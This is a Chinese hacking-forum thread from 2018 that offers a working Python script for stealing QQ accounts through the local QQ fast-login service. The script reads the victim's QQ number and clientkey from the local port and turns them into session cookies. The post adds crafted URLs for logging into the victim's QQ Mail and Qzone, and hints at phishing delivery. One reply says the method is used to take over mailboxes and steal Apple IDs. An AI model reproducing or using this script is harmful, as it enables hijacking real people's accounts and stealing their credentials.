[【通过】] QQ快速登录漏洞盗号

[复制链接]
tsaizq 发表于 2018-8-22 10:09:05 | 显示全部楼层 |阅读模式

正式成员|主题 |帖子 |积分 101

本帖最后由 tsaizq 于 2018-8-30 16:11 编辑

QQ快速登录漏洞盗号

之前看过的一篇文章中讲过依据qq快速登录盗号的原理,这次用python本地的复现了一下,下面是原文章的链接:https://www.cnblogs.com/Leo_wl/p/7508646.html#top

大致的漏洞原理是,qq在本地开了一个端口,用作Web服务器,然后网页ajax向那个qq服务器发送请求,然后获取结果,通过获取的结果,然后进行登录。这个漏洞的利用基础情况是受害者必须在本地已经运行qq的情况之下,运行才能有效果。

直接上代码吧

# -*- coding: UTF-8 –*-
import requests
import re

def getkey():
    com = re.compile(r'"\d*"')
    url = 'http://localhost.ptlogin2.qq.com:4300/pt_get_uins?callback=ptui_getuins_CB&r=0.8785845953581826&pt_local_tk=1'
    payload = {'pt_local_token': '1'}
    headers = {'referer':'https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=522005705&daid=4&s_url=https://mail.qq.com/cgi-bin/login?vt=passport%26vm=wpt%26ft=loginpage%26target=&style=25&low_login=1&proxy_url=https://mail.qq.com/proxy.html&need_qr=0&hide_border=1&border_radius=0&self_regurl=http://zc.qq.com/chs/index.html?type=1&app_id=11005?t=regist&pt_feedback_link=http://support.qq.com/discuss/350_1.shtml&css=https://res.mail.qq.com/zh_CN/htmledition/style/ptlogin_input24e6b9.css'}
    r = requests.post(url, cookies=payload, headers=headers)
    s=r.text
    s=s.encode('utf-8')
    s=str(s)
    ss=re.findall(com,s)
    qqnum=ss[1]
    print qqnum
    qqnum=qqnum.replace('"','')
    url1="http://localhost.ptlogin2.qq.com:4300/pt_get_st?clientuin="+qqnum+"&callback=ptui_getst_CB&r=0.7293395590126179&pt_local_tk=1"
    rr=requests.post(url1, cookies=payload, headers=headers)
    cookies=rr.cookies.get_dict()
    cookies=str(cookies).split(':')
    cookies=cookies[2].replace("'",'')
    cookies=cookies.replace('}','')
    cookies=cookies.replace(' ','')
    url2="http://ssl.ptlogin2.qq.com/jump?clientuin="+qqnum+"&keyindex=9&pt_aid=522005705&daid=4&u1=https%3A%2F%2Fmail.qq.com%2Fcgi-bin%2Flogin%3Fvt%3Dpassport%26vm%3Dwpt%26ft%3Dloginpage%26target%3D&pt_local_tk=1025798287&pt_3rd_aid=0&ptopt=1&style=25"
    payload = {'pt_local_token':'1','clientuin':qqnum,'clientkey':cookies}
    rrr=requests.post(url2, cookies=payload, headers=headers)
    finnalcookies=rrr.cookies.get_dict()
    print finnalcookies,cookies
   
getkey()






本地运行效果如下: 1.png
得到qq号和登录凭证
通过构造qq邮箱登录:
https://ssl.ptlogin2.qq.com/jump?clientuin=qq号码&clientkey=获取的凭证&keyindex=9&daid=4&pt_aid=522005705&u1=https://mail.qq.com/cgi-bin/login?vt=passport&vm=wpt&ft=ptlogin&ss=

2.png
同样的道理,可以构造qq空间登录,其他的也可以,比如web端的qq,微云等等。

https://ssl.ptlogin2.qq.com/jump?pt_clientver=5545&pt_src=1&keyindex=9&ptlang=2052&clientuin=qq号码&clientkey=获取的凭证&u1=https:%2F%2Fuser.qzone.qq.com%2Fqq号码%2Finfocenter&source=panelstar

3.png

最后总结:本人只是在本地进行了测试,当然您可以用其他的方式进行操作(钓鱼什么的你懂的)。这就取决于你啦。 希望能够加入90sec。。-_-






qqkey.py

1.8 KB, 下载次数: 296

测试脚本

庄周梦蝶 发表于 2018-8-23 10:49:42 | 显示全部楼层

正式成员|主题 |帖子 |积分 67

测试失败...
 楼主 tsaizq 发表于 2018-8-24 09:16:31 | 显示全部楼层

正式成员|主题 |帖子 |积分 101

RE: QQ快速登录漏洞盗号


需要本地运行qq程序,然后,再运行这个脚本才行。。
孤城浪子 发表于 2018-8-24 15:59:43 | 显示全部楼层

正式成员|主题 |帖子 |积分 162

测试失败...
blues 发表于 2018-8-26 22:25:19 | 显示全部楼层

正式成员|主题 |帖子 |积分 80

不算漏洞啊,就跟你远控接管了人家电脑,在控制里document.cookies一个道理...
 楼主 tsaizq 发表于 2018-8-30 16:11:45 | 显示全部楼层

正式成员|主题 |帖子 |积分 101

RE: QQ快速登录漏洞盗号


我在附件里添加了,我本地测试是成功的。
 楼主 tsaizq 发表于 2018-9-6 13:19:34 | 显示全部楼层

正式成员|主题 |帖子 |积分 101

RE: QQ快速登录漏洞盗号

blues 发表于 2018-8-26 22:25
不算漏洞啊,就跟你远控接管了人家电脑,在控制里document.cookies一个道理...

很多是用来盗取apple ID 通过这个漏洞登录qq邮箱,然后篡改密码。
快速回复 返回顶部 返回列表